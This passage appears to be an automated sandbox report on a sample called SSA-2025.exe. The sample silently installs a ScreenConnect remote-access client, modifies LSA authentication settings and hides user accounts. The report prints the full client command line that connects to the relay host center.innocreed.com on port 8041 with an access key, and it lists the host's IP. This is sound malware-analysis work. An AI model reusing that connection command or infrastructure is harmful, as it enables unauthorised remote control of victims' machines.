                        Source: C:\Users\user\Desktop\SSA-2025.exeMemory allocated: 8360000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\SSA-2025.exeMemory allocated: 6360000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\SSA-2025.exeMemory allocated: 6360000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\SSA-2025.exeMemory allocated: 85F0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.ClientService.exeMemory allocated: 18E0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.ClientService.exeMemory allocated: 1F30000 memory reserve | memory write watchJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.ClientService.exeMemory allocated: 1CD0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsClient.exeMemory allocated: 17A0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsClient.exeMemory allocated: 1B2E0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsClient.exeMemory allocated: 9D0000 memory reserve | memory write watch
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsClient.exeMemory allocated: 1A4B0000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\SSA-2025.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsFileManager.exeJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.Client.dllJump to dropped file
                        Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI5068.tmp-\ScreenConnect.Windows.dllJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI5CAE.tmpJump to dropped file
                        Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI5068.tmp-\ScreenConnect.Core.dllJump to dropped file
                        Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI5068.tmp-\Microsoft.Deployment.Compression.dllJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsAuthenticationPackage.dllJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.Core.dllJump to dropped file
                        Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI5068.tmp-\ScreenConnect.InstallerActions.dllJump to dropped file
                        Source: C:\Windows\SysWOW64\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI5068.tmpJump to dropped file
                        Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI5068.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.Windows.dllJump to dropped file
                        Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI5068.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dllJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsCredentialProvider.dllJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.ClientService.dllJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI56F0.tmpJump to dropped file
                        Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI5068.tmp-\Microsoft.Deployment.Compression.Cab.dllJump to dropped file
                        Source: C:\Users\user\Desktop\SSA-2025.exe TID: 6220Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsClient.exe TID: 4196Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.ClientService.exeLast function: Thread delayed
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.ClientService.exeLast function: Thread delayed
                        Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SSA-2025.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477
                        Source: ScreenConnect.ClientService.exe, 00000008.00000002.3459934487.0000000005560000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Users\user\Desktop\SSA-2025.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.ClientService.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\Desktop\SSA-2025.exeMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        .NET source code references suspicious native API functions
                        Source: ScreenConnect.ClientService.dll.3.dr, ClientService.csReference to suspicious API methods: WindowsExtensions.OpenProcess(processID, (ProcessAccess)33554432)
                        Source: ScreenConnect.Windows.dll.3.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualAlloc(attemptImageBase, dwSize, WindowsNative.MEM.MEM_COMMIT | WindowsNative.MEM.MEM_RESERVE, WindowsNative.PAGE.PAGE_READWRITE)
                        Source: ScreenConnect.Windows.dll.3.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.LoadLibrary(loadedImageBase + ptr[i].Name)
                        Source: ScreenConnect.Windows.dll.3.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.GetProcAddress(intPtr, ptr5)
                        Source: ScreenConnect.Windows.dll.3.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualProtect(loadedImageBase + sectionHeaders[i].VirtualAddress, (IntPtr)num, flNewProtect, &pAGE)
                        Source: C:\Users\user\Desktop\SSA-2025.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\b396bb1a05b88972\ScreenConnect.ClientSetup.msi"Jump to behavior
                        Source: unknownProcess created: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.ClientService.exe "c:\program files (x86)\screenconnect client (b396bb1a05b88972)\screenconnect.clientservice.exe" "?e=access&y=guest&h=center.innocreed.com&p=8041&s=6c62cec4-0045-44a2-9676-9cabae1b6b1b&k=bgiaaackaabsu0exaagaaaeaaqd5eiiqihsxbbvjujju2o82x7ep34oiqztumnofmf4lm6hxdbfui5yxlkcimb7dvhdmhcecqooo0cznthkap5c2tny0nnpzsqkyev%2f%2fvaer%2b7e3llhth54io65dkzgoquj%2blt0glyt7exfyvq3fdxa2kofj%2fgcemsxgzjf%2f36qxt%2fdj%2blbzb74bn%2bsm3suhgi%2baxhplm9qvqny%2by1x3h93wegpgaakvhpnn0jzjgwrhcpczg4tj5szjstpgzqo3h%2bo1qwwvg03t%2b1dz72fuu9pey5inprnaq1ngxcth4b9yydirydlwvdi4xdnjpui4wfw6qlo%2buacmvablhh0v8nyd"
                        Source: ScreenConnect.WindowsClient.exe, 00000009.00000000.2232490570.0000000000FF2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.drBinary or memory string: Progman
                        Source: ScreenConnect.WindowsClient.exe, 00000009.00000000.2232490570.0000000000FF2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.drBinary or memory string: Shell_TrayWnd-Shell_SecondaryTrayWnd%MsgrIMEWindowClass
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsClient.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsClient.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                        Source: C:\Users\user\Desktop\SSA-2025.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSI5068.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSI5068.tmp-\ScreenConnect.InstallerActions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSI5068.tmp-\ScreenConnect.Core.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSI5068.tmp-\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.Core.dll VolumeInformationJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.Client.dll VolumeInformationJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.Client.dll VolumeInformationJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.Core.dll VolumeInformationJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformationJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsClient.exe VolumeInformation
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.Client.dll VolumeInformation
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.Core.dll VolumeInformation
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.Windows.dll VolumeInformation
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
                        Source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.ClientService.dll VolumeInformation
                        Source: C:\Users\user\Desktop\SSA-2025.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Lowering of HIPS / PFW / Operating System Security Settings

                        barindex
                        Modifies security policies related information
                        Source: C:\Windows\System32\msiexec.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa Authentication PackagesJump to behavior
                        Source: Yara matchFile source: SSA-2025.exe, type: SAMPLE
                        Source: Yara matchFile source: 00000000.00000002.2195384007.0000000005510000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000000.2232490570.0000000000FF2000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.3434546614.00000000032E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.2284864737.00000000024B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000000.2155300379.0000000000356000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2221424696.0000000007361000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2181962492.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: SSA-2025.exe PID: 6276, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 3328, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 3460, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 2488, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Windows\Installer\inprogressinstallinfo.ipi, type: DROPPED
                        Source: Yara matchFile source: C:\Windows\Temp\~DFEC88B264B5E97F4C.TMP, type: DROPPED
                        Source: Yara matchFile source: C:\Windows\Temp\~DF550B457CA4B802ED.TMP, type: DROPPED
                        Source: Yara matchFile source: C:\Windows\Temp\~DFCD11A12CC8450BDF.TMP, type: DROPPED
                        Source: Yara matchFile source: C:\Windows\Temp\~DFF35978247F72F933.TMP, type: DROPPED
                        Source: Yara matchFile source: C:\Windows\Temp\~DF610A57C3150B57FA.TMP, type: DROPPED
                        Source: Yara matchFile source: C:\Windows\Temp\~DF8814AD95F4808848.TMP, type: DROPPED
                        Source: Yara matchFile source: C:\Config.Msi\515402.rbs, type: DROPPED
                        Source: Yara matchFile source: C:\Program Files (x86)\ScreenConnect Client (b396bb1a05b88972)\ScreenConnect.WindowsClient.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Windows\Installer\MSI56C1.tmp, type: DROPPED

                        Mitre Att&ck Matrix

                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity InformationAcquire Infrastructure1
                        Replication Through Removable Media                        		31
                        Windows Management Instrumentation                        		1
                        Component Object Model Hijacking                        		1
                        Component Object Model Hijacking                        		122
                        Masquerading                        		OS Credential Dumping21
                        Security Software Discovery                        		Remote ServicesData from Local System1
                        Non-Standard Port                        		Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault Accounts12
                        Command and Scripting Interpreter                        		2
                        Windows Service                        		2
                        Windows Service                        		11
                        Disable or Modify Tools                        		LSASS Memory2
                        Process Discovery                        		Remote Desktop ProtocolData from Removable Media1
                        Non-Application Layer Protocol                        		Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain Accounts1
                        Scheduled Task/Job                        		1
                        Scheduled Task/Job                        		12
                        Process Injection                        		51
                        Virtualization/Sandbox Evasion                        		Security Account Manager51
                        Virtualization/Sandbox Evasion                        		SMB/Windows Admin SharesData from Network Shared Drive1
                        Application Layer Protocol                        		Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal Accounts1
                        Native API                        		1
                        DLL Side-Loading                        		1
                        Scheduled Task/Job                        		12
                        Process Injection                        		NTDS11
                        Peripheral Device Discovery                        		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchd1
                        DLL Search Order Hijacking                        		1
                        DLL Side-Loading                        		1
                        Hidden Users                        		LSA Secrets1
                        File and Directory Discovery                        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
                        DLL Search Order Hijacking                        		1
                        Rundll32                        		Cached Domain Credentials44
                        System Information Discovery                        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                        Timestomp                        		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                        DLL Side-Loading                        		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                        DLL Search Order Hijacking                        		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                        IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                        File Deletion                        		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1612325 Sample: SSA-2025.exe Startdate: 11/02/2025 Architecture: WINDOWS Score: 42 55 center.innocreed.com 2->55 61 Multi AV Scanner detection for submitted file 2->61 63 .NET source code references suspicious native API functions 2->63 65 Detected potential unwanted application 2->65 67 2 other signatures 2->67 8 msiexec.exe 94 51 2->8         started        12 ScreenConnect.ClientService.exe 2 5 2->12         started        15 SSA-2025.exe 6 2->15         started        signatures3 process4 dnsIp5 35 ScreenConnect.Wind...dentialProvider.dll, PE32+ 8->35 dropped 37 C:\...\ScreenConnect.WindowsClient.exe, PE32 8->37 dropped 39 C:\...\ScreenConnect.ClientService.exe, PE32 8->39 dropped 43 10 other files (1 malicious) 8->43 dropped 73 Enables network access during safeboot for specific services 8->73 75 Modifies security policies related information 8->75 17 msiexec.exe 8->17         started        19 msiexec.exe 1 8->19         started        21 msiexec.exe 8->21         started        57 center.innocreed.com 193.26.115.242, 49717, 8041 QUICKPACKETUS Netherlands 12->57 77 Reads the Security eventlog 12->77 79 Reads the System eventlog 12->79 23 ScreenConnect.WindowsClient.exe 3 12->23         started        26 ScreenConnect.WindowsClient.exe 2 12->26         started        41 C:\Users\user\AppData\...\SSA-2025.exe.log, ASCII 15->41 dropped 81 Contains functionality to hide user accounts 15->81 28 msiexec.exe 6 15->28         started        file6 signatures7 process8 file9 31 rundll32.exe 11 17->31         started        69 Creates files in the system32 config directory 23->69 71 Contains functionality to hide user accounts 23->71 45 C:\Users\user\AppData\Local\...\MSI5068.tmp, PE32 28->45 dropped signatures10 process11 file12 47 C:\Users\user\...\ScreenConnect.Windows.dll, PE32 31->47 dropped 49 C:\...\ScreenConnect.InstallerActions.dll, PE32 31->49 dropped 51 C:\Users\user\...\ScreenConnect.Core.dll, PE32 31->51 dropped 53 4 other files (none is malicious) 31->53 dropped 59 Contains functionality to hide user accounts 31->59 signatures13

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.